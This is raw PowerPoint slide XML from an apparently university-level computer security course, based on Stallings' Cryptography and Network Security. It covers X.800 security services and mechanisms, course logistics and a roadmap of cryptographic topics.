              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>have both peer-entity &amp; data origin authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Access Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0" smtClean="0"/>
              <a:t>prevention of the unauthorized use of a resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Data Confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0" smtClean="0"/>
              <a:t>protection of data from unauthorized disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Data Integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0" smtClean="0"/>
              <a:t>assurance that data received is as sent by an authorized entity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Non-Repudiation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0" smtClean="0"/>
              <a:t>protection against denial by one of the parties in a communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Availability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> – resource accessible/usable</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="28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err="1" smtClean="0"/>
              <a:t>InformaTION</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>10 ECTS (5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Theory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t> + 5 Lab = 96 hours)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Suggested</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>material</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>W. Stallings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Cryptography and Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>W. Stallings, Computer Security: Principles and Practice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Online </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>material</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Required skills:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Operating Systems, Computer Networks, Databases, Web Information Systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>In other words, a bachelor degree in Computer Science</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"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fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Security Mechanism</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>feature designed to detect, prevent, or recover from a security attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" smtClean="0"/>
              <a:t>no single mechanism that will support all services required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>however </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" smtClean="0"/>
              <a:t>one particular element underlies many of the security mechanisms in use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" b="1" smtClean="0"/>
              <a:t>cryptographic techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>hence our focus on this topic</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU" altLang="it-IT"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fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Security Mechanisms (X.800)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8229600" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" sz="3600" smtClean="0"/>
              <a:t>specific security mechanisms:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>encipherment, digital signatures, access controls, data integrity, authentication exchange, traffic padding, routing control, notarization</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT" sz="3600" smtClean="0"/>
              <a:t>pervasive security mechanisms:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0"/>
              <a:t>trusted functionality, security labels, event detection, security audit trails, security recovery</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" altLang="it-IT"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fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Model for Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Immagine 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1700808"/>
            <a:ext cx="8297395" cy="437234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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Model for Network Access Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4000" smtClean="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61" y="2708920"/>
            <a:ext cx="8721358" cy="297181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FOOD of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>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LOGICAL FALLACY of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>day</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57347" name="Immagine 4" descr="https://yourlogicalfallacyis.com/pdf/LogicalFallaciesInfographic_A3.pdf - Google Chrome"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="60313" t="17091" r="5208" b="44102"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1403350" y="1844675"/>
            <a:ext cx="61928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LOGICAL FALLACY of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>day</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59395" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="9373" t="24306" r="38594" b="19167"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="1989138"/>
            <a:ext cx="634365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457200"/>
            <a:ext cx="7848600" cy="2765425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cryptography and Network Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Chapter 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3657600"/>
            <a:ext cx="6400800" cy="2671763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Fifth Edition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>by William Stallings	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Lecture slides by Lawrie Brown</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"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ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-107" charset="-128"/>
              </a:rPr>
              <a:t>Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63491" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Cryptographic algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>symmetric ciphers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>asymmetric encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>hash functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Mutual Trust</a:t>
